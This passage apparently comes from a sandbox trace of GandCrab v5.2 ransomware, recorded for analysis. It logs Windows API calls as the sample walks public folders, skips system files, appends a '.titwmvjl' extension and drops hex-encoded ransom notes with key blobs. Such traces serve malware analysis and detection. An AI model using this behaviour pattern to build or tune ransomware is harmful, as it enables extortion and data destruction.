0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0097.013] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0097.015] CloseHandle (hObject=0x2ac) returned 1 [0097.015] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.015] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.015] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0x14c)) [0097.016] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.016] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0097.016] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0097.016] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Documents\\My Videos\\d2ca4a09d2ca4deb61a.lock") returned 60 [0097.016] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Videos\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\public\\documents\\my videos\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0097.017] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.017] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.017] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos\\") returned 36 [0097.017] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Videos\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\*") returned="C:\\Users\\Public\\Documents\\My Videos\\*" [0097.017] FindFirstFileExW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0xffffffff [0097.017] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0xffffffff [0097.018] CloseHandle (hObject=0x2ac) returned 1 [0097.018] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.018] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0097.018] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0097.018] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\Documents\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Public\\Documents\\TITWMVJL-DECRYPT.txt" [0097.018] lstrlenW (lpString=".titwmvjl") returned 9 [0097.018] lstrlenW (lpString="C:\\Users\\Public\\Documents\\TITWMVJL-DECRYPT.txt") returned 46 [0097.018] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.018] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Documents\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 55 [0097.018] lstrlenW (lpString="C:\\Users\\Public\\Documents\\TITWMVJL-DECRYPT.txt") returned 46 [0097.018] lstrlenW (lpString=".txt") returned 4 [0097.018] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.018] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0097.018] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0097.018] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.018] lstrlenW (lpString="C:\\Users\\Public\\Documents\\TITWMVJL-DECRYPT.txt") returned 46 [0097.018] lstrlenW (lpString="C:\\Users\\Public\\Documents\\TITWMVJL-DECRYPT.txt") returned 46 [0097.019] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0097.019] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0097.019] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0097.019] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0097.019] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0097.019] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0097.019] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0097.019] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0097.019] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.019] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0097.019] FindClose (in: hFindFile=0x503238 | out: hFindFile=0x503238) returned 1 [0097.019] CloseHandle (hObject=0x230) returned 1 [0097.019] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0097.019] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0097.019] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0097.020] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Downloads" | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0097.020] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Downloads\\") returned="C:\\Users\\Public\\Downloads\\" [0097.020] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0097.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.020] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0097.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.020] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0097.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.020] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0097.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.021] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0097.021] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.021] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.021] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Downloads\\\\TITWMVJL-DECRYPT.txt") returned 47 [0097.021] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\public\\downloads\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0097.021] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x4